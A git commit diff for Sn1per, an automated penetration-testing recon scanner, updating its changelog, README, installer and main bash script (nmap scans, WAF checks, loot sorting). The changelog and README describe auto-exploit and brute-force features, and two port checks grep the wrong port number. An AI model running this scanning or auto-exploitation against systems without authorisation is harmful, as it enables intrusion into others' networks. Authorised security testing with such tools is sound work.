Sn1per by 1N3@CrowdShield

Merge branch 'master' of https://github.com/1N3/Sniper
2016-08-24 11:42:56 -04:00 · 2016-08-24 11:40:59 -04:00 · 2016-08-24 11:36:02 -04:00 · 2016-08-24 10:50:42 -04:00 · 2016-08-21 15:43:10 -07:00 · 2016-08-21 18:40:24 -04:00
5 changed files with 305 additions and 181 deletions
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -0,0 +1,101 @@
+## CHANGELOG:
+* v1.9 - Added Ubuntu docker image for Sn1per (@menzow)
+* v1.9 - Added automatic loot directory sorting for all modes
+* v1.9 - Added MSSQL port 1433/tcp checks
+* v1.9 - Added SNMP port 162/tcp checks (@hexageek)
+* v1.9 - Added nslookup to install.sh
+* v1.9 - Fixed install.sh dependency duplicates
+* v1.8c - Added -A option to all NMap port scans
+* v1.8c - Fixed install.sh permission issue
+* v1.8c - Fixed install.sh cleanup options
+* v1.8c - Added ssh-audit
+* v1.8c - Added install directory (/usr/share/sniper/) to install script for universal access
+* v1.8c - Fixed issue with Metasploit SSH scans
+* v1.8c - Added auto-update to install.sh to automatically pull latest github release
+* v1.8b - Fixed bug with NMap UDP scan options
+* v1.8b - Fixed install.sh dependencies 
+* v1.8b - Fixed jexboss options
+* v1.8a - Updated sub-domain hijack list of domains (CC: th3gundy)
+* v1.8 - Added sub-domain hijack scans for all sub-domains
+* v1.8 - Added auto explort of all sub-domains to /domains directory
+* v1.8 - Added additional stealth and airstrike checks for port 80 and 443
+* v1.8 - Fixed issue with theHarvester not working with google
+* v1.7g - Added email security/spoofing checks
+* v1.7f - Added Zenmap XML auto-imports 
+* v1.7f - Added ClamAV RCE Nmap script
+* v1.7e - Fixed minor issue with airstrike and nuke mode
+* v1.7e - Fixed minor issues with discover mode
+* v1.7e - Added minor cosmetic improvements to reports
+* v1.7e - Disabled automatic brute forcing by default
+* v1.7e - Added automatic brute force setting in script vars
+* v1.7d - Added sslyze
+* v1.7d - Added 'discover' mode for full subnet scans
+* v1.7d - Added verbosity to scan tasks to separate sub-tasks better
+* v1.7c - Added plain text reporting 
+* v1.7c - Improved loot directory structure and sorting
+* v1.7b - Fixed issue with airstrike mode not scanning correctly
+* v1.7b - Improved passive recon performance
+* v1.7a - Improved NMap http scan performance
+* v1.7a - Removed joomscan due to verbosity issues
+* v1.7 - Added uniscan web vulnerability scanner
+* v1.7 - Added joomscan Joomla scanner
+* v1.7 - Improved web scan performance
+* v1.7 - Fixed issue with inurlbr output
+* v1.7 - Added remote desktop viewing for RDP connections
+* v1.7 - Added experimental Metasploit exploit for Apache Struts RCE (CVE-2016-3081)
+* v1.6e - Added reporting option for nobrute mode (CC. @mero01)
+* v1.6e - Improved SMB scan performance/optimization added
+* v1.6d - Improved NMap scan performance options
+* v1.6d - Added xprobe2 OS finger printing tool
+* v1.6d - Added jexbos JBoss autopwn
+* v1.6d - Merged fix for theharvester package (CC. @RubenRocha)
+* v1.6d - Merged fix for SuperMicroScanner (CC. @mero01)
+* v1.6c - Add report mode for web scans
+* v1.6c - Fixed issues with Sublist3r and theharvester
+* v1.6c - Added Shocker Shellshock exploitation scanner
+* v1.6b - Added Sublist3r sub-domain brute tool
+* v1.6b - Added cutycapt web screenshot util
+* v1.6a - Added improvements to recon phase
+* v1.6a - Fixed small issue with 3rd party extension
+* v1.6a - Various improvements to overall optimization of scans
+* v1.6a - Added new "web" mode for full web application scans 
+* v1.6 - Added 4 new modes including: stealth, port, airstrike and nuke
+* v1.6 - Added Java de-serialization scanner
+* v1.6 - Added reporting option to output to console and text file for all scans
+* v1.6 - Added option to set Sn1per full path for universal command line access
+* v1.6 - Added in DirBuster for web file brute forcing
+* v1.6 - Fixed issue with sderr errors in TheHarvester
+* v1.5e - Removed shodan command line tool due to issues
+* v1.5e - Fixed wafwoof installation in kali 2.0
+* v1.5d - Fixed minor issues with port 513/tmp and 514/tcp checks
+* v1.5c - Fixed issue which broke link to sniper directory
+* v1.5b - Added Squid Proxy checks port 3128/tcp
+* v1.5b - Fixed shodan setup options in install.sh
+* v1.5b - Fixed syntax error with theHarvester in install.sh
+* v1.5a - Fixed syntax error with port 8081 checks
+* v1.5a - Added Arachni integration
+* v1.5a - Added vsftpd, proftpd, mysql, unrealircd auto exploits
+* v1.5 - Added Metasploit scan and auto-exploit modules
+* v1.5 - Added additional port checks
+* v1.5 - Added full TCP/UDP NMap XML output
+* v1.5 - Auto tune scan for either IP or hostname/domain
+* v1.4h - Added auto IP/domain name scan configurations
+* v1.4g - Added finger enumeration scripts
+* v1.4g - Fixed nmap -p 445 target issue
+* v1.4g - Fixed smtp-enum target issue
+* v1.4f - Fixed BruteX directory bug
+* v1.4e - Fixed reported errors install.sh
+* v1.4e - Added auto-upgrade option to install.sh for existing Sn1per installs
+* v1.4d - Fixed missing rake gem install dependency
+* v1.4c - Reordered 3rd party extensions
+* v1.4b - Fixed install.sh executable references
+* v1.4b - Fixed Yasou dependencies in install.sh
+* v1.4b - Fixed minor issues with BruteX loot directory
+* v1.4 - Added Yasou for automatic web form brute forcing
+* v1.4 - Added MassBleed for SSL vulnerability detection
+* v1.4 - Added Breach-Miner for detection of breached accounts
+* v1.4 - Fixed minor errors with nmap
+* v1.4 - Removed debug output from goohak from displaying on console
+
+## FUTURE:
+* Add scan config options to enabled/disable certain scan tasks (ie. brute force, osint, web scans, etc.)
--- a/README.md
+++ b/README.md
@@ -1,9 +1,11 @@
-# Sn1per - Automated Pentest Recon Scanner
 ![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.png)

 ## ABOUT:
 Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. 

+## DEMO VIDEO:
+[![Sn1per Demo](https://img.youtube.com/vi/nA_V_u3QZA4/0.jpg)](https://www.youtube.com/watch?v=nA_V_u3QZA4)
+
 ## FEATURES:
 * Automatically collects basic recon (ie. whois, ping, DNS, etc.)
 * Automatically launches Google hacking queries against a target domain
@@ -18,122 +20,49 @@ Sn1per is an automated scanner that can be used during a penetration test to enu
 * Performs high level enumeration of multiple hosts
 * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds

-## INSTALL:
+## KALI LINUX INSTALL:
 ```
-./install.sh - Installs all dependencies OR upgrades existing Sn1per installations. Best run from Kali Linux. 
+./install.sh
+```
+
+## DOCKER INSTALL:
+
+Docker Install:
+https://github.com/menzow/sn1per-docker
+
+Docker Build:
+https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/
+
+Example usage:
+```
+$ docker pull menzo/sn1per-docker
+$ docker run --rm -ti menzo/sn1per-docker sniper menzo.io
 ```

 ## USAGE:
 ```
-# sniper <target> <report>
-# sniper <target> stealth <report>
-# sniper <CIDR> discover
-# sniper <target> port <portnum> 
-# sniper <target> web <report>
-# sniper <target> nobrute <report>
-# sniper <targets.txt> airstrike <report>
-# sniper <targets.txt> nuke <report>
+sniper <target> <report>
+sniper <target> stealth <report>
+sniper <CIDR> discover
+sniper <target> port <portnum> 
+sniper <target> web <report>
+sniper <target> nobrute <report>
+sniper <targets.txt> airstrike <report>
+sniper <targets.txt> nuke <report>
+sniper loot
 ```

 ### MODES:
-* REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append 'report' to any sniper mode or command.
-* STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking
-* DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
-* PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
-* WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.   
-* NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.
-* AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
-* NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. 
+* **REPORT:** Outputs all results to text in the loot directory for later reference. To enable reporting, append 'report' to any sniper mode or command.
+* **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking
+* **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
+* **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
+* **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.   
+* **NOBRUTE:** Launches a full scan against a target host/domain without brute forcing services.
+* **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
+* **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. 
+* **LOOT:** Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type 'sniper loot'.

 ## SAMPLE REPORT:
-```
 https://gist.github.com/1N3/8214ec2da2c91691bcbc
-```

-## CHANGELOG:
-* v1.8a - Updated sub-domain hijack list of domains (CC: th3gundy)
-* v1.8 - Added sub-domain hijack scans for all sub-domains
-* v1.8 - Added auto explort of all sub-domains to /domains directory
-* v1.8 - Added additional stealth and airstrike checks for port 80 and 443
-* v1.8 - Fixed issue with theHarvester not working with google
-* v1.7g - Added email security/spoofing checks
-* v1.7f - Added Zenmap XML auto-imports 
-* v1.7f - Added ClamAV RCE Nmap script
-* v1.7e - Fixed minor issue with airstrike and nuke mode
-* v1.7e - Fixed minor issues with discover mode
-* v1.7e - Added minor cosmetic improvements to reports
-* v1.7e - Disabled automatic brute forcing by default
-* v1.7e - Added automatic brute force setting in script vars
-* v1.7d - Added sslyze
-* v1.7d - Added 'discover' mode for full subnet scans
-* v1.7d - Added verbosity to scan tasks to separate sub-tasks better
-* v1.7c - Added plain text reporting 
-* v1.7c - Improved loot directory structure and sorting
-* v1.7b - Fixed issue with airstrike mode not scanning correctly
-* v1.7b - Improved passive recon performance
-* v1.7a - Improved NMap http scan performance
-* v1.7a - Removed joomscan due to verbosity issues
-* v1.7 - Added uniscan web vulnerability scanner
-* v1.7 - Added joomscan Joomla scanner
-* v1.7 - Improved web scan performance
-* v1.7 - Fixed issue with inurlbr output
-* v1.7 - Added remote desktop viewing for RDP connections
-* v1.7 - Added experimental Metasploit exploit for Apache Struts RCE (CVE-2016-3081)
-* v1.6e - Added reporting option for nobrute mode (CC. @mero01)
-* v1.6e - Improved SMB scan performance/optimization added
-* v1.6d - Improved NMap scan performance options
-* v1.6d - Added xprobe2 OS finger printing tool
-* v1.6d - Added jexbos JBoss autopwn
-* v1.6d - Merged fix for theharvester package (CC. @RubenRocha)
-* v1.6d - Merged fix for SuperMicroScanner (CC. @mero01)
-* v1.6c - Add report mode for web scans
-* v1.6c - Fixed issues with Sublist3r and theharvester
-* v1.6c - Added Shocker Shellshock exploitation scanner
-* v1.6b - Added Sublist3r sub-domain brute tool
-* v1.6b - Added cutycapt web screenshot util
-* v1.6a - Added improvements to recon phase
-* v1.6a - Fixed small issue with 3rd party extension
-* v1.6a - Various improvements to overall optimization of scans
-* v1.6a - Added new "web" mode for full web application scans 
-* v1.6 - Added 4 new modes including: stealth, port, airstrike and nuke
-* v1.6 - Added Java de-serialization scanner
-* v1.6 - Added reporting option to output to console and text file for all scans
-* v1.6 - Added option to set Sn1per full path for universal command line access
-* v1.6 - Added in DirBuster for web file brute forcing
-* v1.6 - Fixed issue with sderr errors in TheHarvester
-* v1.5e - Removed shodan command line tool due to issues
-* v1.5e - Fixed wafwoof installation in kali 2.0
-* v1.5d - Fixed minor issues with port 513/tmp and 514/tcp checks
-* v1.5c - Fixed issue which broke link to sniper directory
-* v1.5b - Added Squid Proxy checks port 3128/tcp
-* v1.5b - Fixed shodan setup options in install.sh
-* v1.5b - Fixed syntax error with theHarvester in install.sh
-* v1.5a - Fixed syntax error with port 8081 checks
-* v1.5a - Added Arachni integration
-* v1.5a - Added vsftpd, proftpd, mysql, unrealircd auto exploits
-* v1.5 - Added Metasploit scan and auto-exploit modules
-* v1.5 - Added additional port checks
-* v1.5 - Added full TCP/UDP NMap XML output
-* v1.5 - Auto tune scan for either IP or hostname/domain
-* v1.4h - Added auto IP/domain name scan configurations
-* v1.4g - Added finger enumeration scripts
-* v1.4g - Fixed nmap -p 445 target issue
-* v1.4g - Fixed smtp-enum target issue
-* v1.4f - Fixed BruteX directory bug
-* v1.4e - Fixed reported errors install.sh
-* v1.4e - Added auto-upgrade option to install.sh for existing Sn1per installs
-* v1.4d - Fixed missing rake gem install dependency
-* v1.4c - Reordered 3rd party extensions
-* v1.4b - Fixed install.sh executable references
-* v1.4b - Fixed Yasou dependencies in install.sh
-* v1.4b - Fixed minor issues with BruteX loot directory
-* v1.4 - Added Yasou for automatic web form brute forcing
-* v1.4 - Added MassBleed for SSL vulnerability detection
-* v1.4 - Added Breach-Miner for detection of breached accounts
-* v1.4 - Fixed minor errors with nmap
-* v1.4 - Removed debug output from goohak from displaying on console
-
-## FUTURE:
-* Add install.sh for Ubuntu based systems
-* Add install path to install.sh for universal access
-* Add scan config options to enabled/disable certain scan tasks (ie. brute force, osint, web scans, etc.)
--- a/Sn1per-logo.png
+++ b/Sn1per-logo.png
--- a/install.sh
+++ b/install.sh
@@ -18,21 +18,26 @@ echo -e "$RESET"
 echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
 echo ""

-DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
+# DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
+INSTALL_DIR=/usr/share/sniper

-echo -e "$OKGREEN + -- --=[This script will install or upgrade your Sn1per installation. Are you sure you want to continue?$RESET"
+echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue?$RESET"
 read answer

+mkdir -p $INSTALL_DIR 2> /dev/null
+cp -Rf $PWD/* $INSTALL_DIR 
+cd $INSTALL_DIR
+
 echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
-apt-get install dos2unix zenmap sslyze joomscan uniscan xprobe2 cutycapt unicornscan waffit host whois arachni theharvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap
-pip install dnspython colorama tldextract
+apt-get install ruby nslookup rubygems python dos2unix zenmap sslyze uniscan xprobe2 cutycapt unicornscan waffit host whois dirb dnsrecon curl nmap php5 php5-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
+pip install dnspython colorama tldextract urllib3 ipaddress

 echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
 gem install rake
 gem install ruby-nmap net-http-persistent mechanize text-table

 echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
-rm -Rf Findsploit/ Brutex/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ CrackMapExec/
+rm -Rf Findsploit/ Brutex/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/

 echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
 git clone https://github.com/1N3/Findsploit.git
@@ -47,22 +52,23 @@ git clone https://github.com/johndekroon/serializekiller.git
 git clone https://github.com/aboul3la/Sublist3r.git
 git clone https://github.com/nccgroup/shocker.git
 git clone https://github.com/joaomatosf/jexboss.git
-git clone https://github.com/byt3bl33d3r/CrackMapExec.git
 git clone https://github.com/drwetter/testssl.sh.git
 git clone https://github.com/lunarca/SimpleEmailSpoofer
+git clone https://github.com/arthepsy/ssh-audit

 echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
 mkdir loot 2> /dev/null
-cp -f $DIR/bin/clamav-exec.nse /usr/share/nmap/scripts/ 2> /dev/null
-chmod +x $DIR/sniper
-chmod +x $DIR/bin/dnsdict6
-chmod +x $DIR/Goohak/goohak
-chmod +x $DIR/XSSTracer/xsstracer.py
-chmod +x $DIR/MassBleed/massbleed
-chmod +x $DIR/MassBleed/heartbleed.py
-chmod +x $DIR/MassBleed/openssl_ccs.pl
-chmod +x $DIR/SuperMicro-Password-Scanner/supermicro_scan.sh
-chmod +x $DIR/testssl.sh/testssl.sh
+cp -f $INSTALL_DIR/bin/clamav-exec.nse /usr/share/nmap/scripts/ 2> /dev/null
+chmod +x $INSTALL_DIR/sniper
+chmod +x $INSTALL_DIR/bin/dnsdict6
+chmod +x $INSTALL_DIR/Goohak/goohak
+chmod +x $INSTALL_DIR/XSSTracer/xsstracer.py
+chmod +x $INSTALL_DIR/MassBleed/massbleed
+chmod +x $INSTALL_DIR/MassBleed/heartbleed.py
+chmod +x $INSTALL_DIR/MassBleed/openssl_ccs.pl
+chmod +x $INSTALL_DIR/MassBleed/winshock.sh 
+chmod +x $INSTALL_DIR/SuperMicro-Password-Scanner/supermicro_scan.sh
+chmod +x $INSTALL_DIR/testssl.sh/testssl.sh
 rm -f /usr/bin/sniper
 rm -f /usr/bin/goohak
 rm -f /usr/bin/xsstracer
@@ -71,17 +77,17 @@ rm -f /usr/bin/copysploit
 rm -f /usr/bin/compilesploit
 rm -f /usr/bin/massbleed
 rm -f /usr/bin/brutex
-ln -s $DIR/sniper /usr/bin/sniper
-ln -s $DIR/Goohak/goohak /usr/bin/goohak
-ln -s $DIR/XSSTracer/xsstracer.py /usr/bin/xsstracer
-ln -s $DIR/Findsploit/findsploit /usr/bin/findsploit
-ln -s $DIR/Findsploit/copysploit /usr/bin/copysploit
-ln -s $DIR/Findsploit/compilesploit /usr/bin/compilesploit
-ln -s $DIR/MassBleed/massbleed /usr/bin/massbleed
-ln -s $DIR/BruteX/brutex /usr/bin/brutex
-ln -s $DIR/testssl.sh/testssl.sh /usr/bin/testssl
-
-echo -e "$OKORANGE + -- --=[For universal sniper access, be sure to edit sniper to include the full path for the SNIPER_DIR variable. $RESET"
+rm -f /usr/bin/testssl
+ln -s $INSTALL_DIR/sniper /usr/bin/sniper
+ln -s $INSTALL_DIR/Goohak/goohak /usr/bin/goohak
+ln -s $INSTALL_DIR/XSSTracer/xsstracer.py /usr/bin/xsstracer
+ln -s $INSTALL_DIR/Findsploit/findsploit /usr/bin/findsploit
+ln -s $INSTALL_DIR/Findsploit/copysploit /usr/bin/copysploit
+ln -s $INSTALL_DIR/Findsploit/compilesploit /usr/bin/compilesploit
+ln -s $INSTALL_DIR/MassBleed/massbleed /usr/bin/massbleed
+ln -s $INSTALL_DIR/BruteX/brutex /usr/bin/brutex
+ln -s $INSTALL_DIR/testssl.sh/testssl.sh /usr/bin/testssl
 echo -e "$OKORANGE + -- --=[Done!$RESET"
+echo -e "$OKORANGE + -- --=[To run, type 'sniper'! $RESET"


--- a/180
+++ b/180
@@ -1,5 +1,5 @@
 #!/bin/bash
-# + -- --=[Sn1per v1.8 by 1N3
+# + -- --=[Sn1per v1.9 by 1N3
 # + -- --=[http://crowdshield.com
 #
 # Sn1per - Automated Pentest Recon Tool
@@ -31,9 +31,9 @@
 # ./sniper loot
 #
 # UNCOMMENT AND SET TARGET DIR FOR UNIVERSAL ACCESS (ie. sniper <target>)
-# cd /pentest/web/Sn1per/ 
+cd /usr/share/sniper/ 

-clear
+#clear

 TARGET="$1"
 MODE="$2"
@@ -69,7 +69,7 @@ if [ -z $TARGET ]; then
 	echo -e "$OKRED               /_/                 $RESET"
 	echo -e ""
 	echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
-	echo -e "$OKORANGE + -- --=[sn1per v1.8 by 1N3$RESET"
+	echo -e "$OKORANGE + -- --=[sn1per v1.9 by 1N3$RESET"
 	echo -e "$OKORANGE + -- --=[Usage: sn1per <target>$RESET"
 	echo ""
 	exit
@@ -82,7 +82,7 @@ else
 	SCAN_TYPE="DOMAIN"
 fi

-clear
+#clear

 if [ "$MODE" = "report" ]; then
 	./sniper $TARGET | tee ./loot/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
@@ -160,6 +160,21 @@ fi
 if [ "$MODE" = "web" ]; then
 	if [ "$OPT1" = "report" ]; then
 		./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
+		cd $PWD/loot/
+		echo -e "$OKORANGE + -- --=[Sorting loot directory ($PWD)"
+		mkdir reports/ -p 2> /dev/null
+		echo -e "$OKORANGE + -- --=[Generating reports..."
+		for a in `ls sniper-*.txt 2>/dev/null`; do echo "$a" >> reports/$a && sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a > reports/$a; done
+		mv $PWD/report-* $PWD/reports/ 2> /dev/null
+		mkdir $PWD/screenshots/ -p 2> /dev/null
+		mv $PWD/*.jpg $PWD/screenshots/ 2> /dev/null
+		mkdir $PWD/nmap -p 2> /dev/null
+		mv $PWD/*.xml $PWD/nmap/ 2> /dev/null
+		mkdir $PWD/domains -p 2> /dev/null
+		mv $PWD/domains-* $PWD/domains/ 2> /dev/null
+		mkdir $PWD/output -p 2> /dev/null
+		mv $PWD/sniper-* $PWD/output 2> /dev/null
+		rm -f $PWD/.fuse_* 2> /dev/null
 		exit
 	fi
 fi
@@ -177,7 +192,7 @@ if [ "$MODE" = "stealth" ]; then
 	echo -e "$OKRED               /_/                 $RESET"
 	echo -e "$RESET"
 	echo -e "$OKORANGE + -- --=[http://crowdshield.com"
-	echo -e "$OKORANGE + -- --=[sn1per v1.8 by 1N3"
+	echo -e "$OKORANGE + -- --=[sn1per v1.9 by 1N3"
 	echo -e "$OKRED " 	
 	echo -e "$OKRED     ./\."
 	echo -e "$OKRED   ./    '\."
@@ -234,7 +249,7 @@ if [ "$MODE" = "stealth" ]; then
 	echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
 	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
 	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
-	nmap -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
+	nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
 	echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
 	wafw00f http://$TARGET
 	wafw00f https://$TARGET
@@ -253,6 +268,21 @@ if [ "$MODE" = "stealth" ]; then
 	cutycapt --url=https://$TARGET --out=loot/$TARGET-port443.jpg
 	echo -e "$OKRED[+]$RESET Screenshot saved to $PWD/loot/$TARGET-port443.jpg"
 	echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
+	cd $PWD/loot/
+	echo -e "$OKORANGE + -- --=[Sorting loot directory ($PWD)"
+	mkdir reports/ -p 2> /dev/null
+	echo -e "$OKORANGE + -- --=[Generating reports..."
+	for a in `ls sniper-*.txt 2>/dev/null`; do echo "$a" >> reports/$a && sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a > reports/$a; done
+	mv $PWD/report-* $PWD/reports/ 2> /dev/null
+	mkdir $PWD/screenshots/ -p 2> /dev/null
+	mv $PWD/*.jpg $PWD/screenshots/ 2> /dev/null
+	mkdir $PWD/nmap -p 2> /dev/null
+	mv $PWD/*.xml $PWD/nmap/ 2> /dev/null
+	mkdir $PWD/domains -p 2> /dev/null
+	mv $PWD/domains-* $PWD/domains/ 2> /dev/null
+	mkdir $PWD/output -p 2> /dev/null
+	mv $PWD/sniper-* $PWD/output 2> /dev/null
+	rm -f $PWD/.fuse_* 2> /dev/null
 	exit
 fi

@@ -269,7 +299,7 @@ if [ "$MODE" = "airstrike" ]; then
 	echo -e "$OKRED               /_/                 $RESET"
 	echo -e "$RESET"
 	echo -e "$OKORANGE + -- --=[http://crowdshield.com"
-	echo -e "$OKORANGE + -- --=[sn1per v1.8 by 1N3"
+	echo -e "$OKORANGE + -- --=[sn1per v1.9 by 1N3"

 	for a in `cat $TARGET`;
 	do
@@ -331,7 +361,7 @@ if [ "$MODE" = "airstrike" ]; then
 		echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
 		nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $a -oX $LOOT_DIR/nmap-$a.xml
 		echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
-		nmap -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a
+		nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a
 		echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
 		wafw00f http://$a
 		wafw00f https://$a
@@ -350,6 +380,21 @@ if [ "$MODE" = "airstrike" ]; then
 		cutycapt --url=https://$a --out=loot/$a-port443.jpg
 		echo -e "$OKRED[+]$RESET Screenshot saved to $PWD/loot/$a-port443.jpg"
 		echo -e "$OKGREEN + -- ----------------------------=[Done!]=----------------------------------- -- +$RESET"
+		cd $PWD/loot/
+		echo -e "$OKORANGE + -- --=[Sorting loot directory ($PWD)"
+		mkdir reports/ -p 2> /dev/null
+		echo -e "$OKORANGE + -- --=[Generating reports..."
+		for a in `ls sniper-*.txt 2>/dev/null`; do echo "$a" >> reports/$a && sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a > reports/$a; done
+		mv $PWD/report-* $PWD/reports/ 2> /dev/null
+		mkdir $PWD/screenshots/ -p 2> /dev/null
+		mv $PWD/*.jpg $PWD/screenshots/ 2> /dev/null
+		mkdir $PWD/nmap -p 2> /dev/null
+		mv $PWD/*.xml $PWD/nmap/ 2> /dev/null
+		mkdir $PWD/domains -p 2> /dev/null
+		mv $PWD/domains-* $PWD/domains/ 2> /dev/null
+		mkdir $PWD/output -p 2> /dev/null
+		mv $PWD/sniper-* $PWD/output 2> /dev/null
+		rm -f $PWD/.fuse_* 2> /dev/null
 		echo -e ""
 		echo -e ""
 		echo -e ""
@@ -425,7 +470,7 @@ echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 echo -e "$OKRED               /_/                 $RESET"
 echo -e "$RESET"
 echo -e "$OKORANGE + -- --=[http://crowdshield.com"
-echo -e "$OKORANGE + -- --=[sn1per v1.8 by 1N3"
+echo -e "$OKORANGE + -- --=[sn1per v1.9 by 1N3"
 echo -e "$RESET"
 echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
 nslookup $TARGET
@@ -458,7 +503,7 @@ echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=----
 if [ -z "$OPT1" ]; then
 	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
 	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
-	nmap -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
+	nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
 elif [ "$OPT1" == "web" ]; then
 	nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
 else
@@ -482,6 +527,7 @@ port_110=`grep 'portid="110"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
 port_111=`grep 'portid="111"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
 port_135=`grep 'portid="135"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
 port_139=`grep 'portid="139"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
+port_161=`grep 'portid="161"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
 port_162=`grep 'portid="162"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
 port_389=`grep 'portid="162"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
 port_443=`grep 'portid="443"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
@@ -490,6 +536,7 @@ port_512=`grep 'portid="512"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
 port_513=`grep 'portid="513"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
 port_514=`grep 'portid="514"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
 port_1099=`grep 'portid="1099"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
+port_1433=`grep 'portid="1099"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
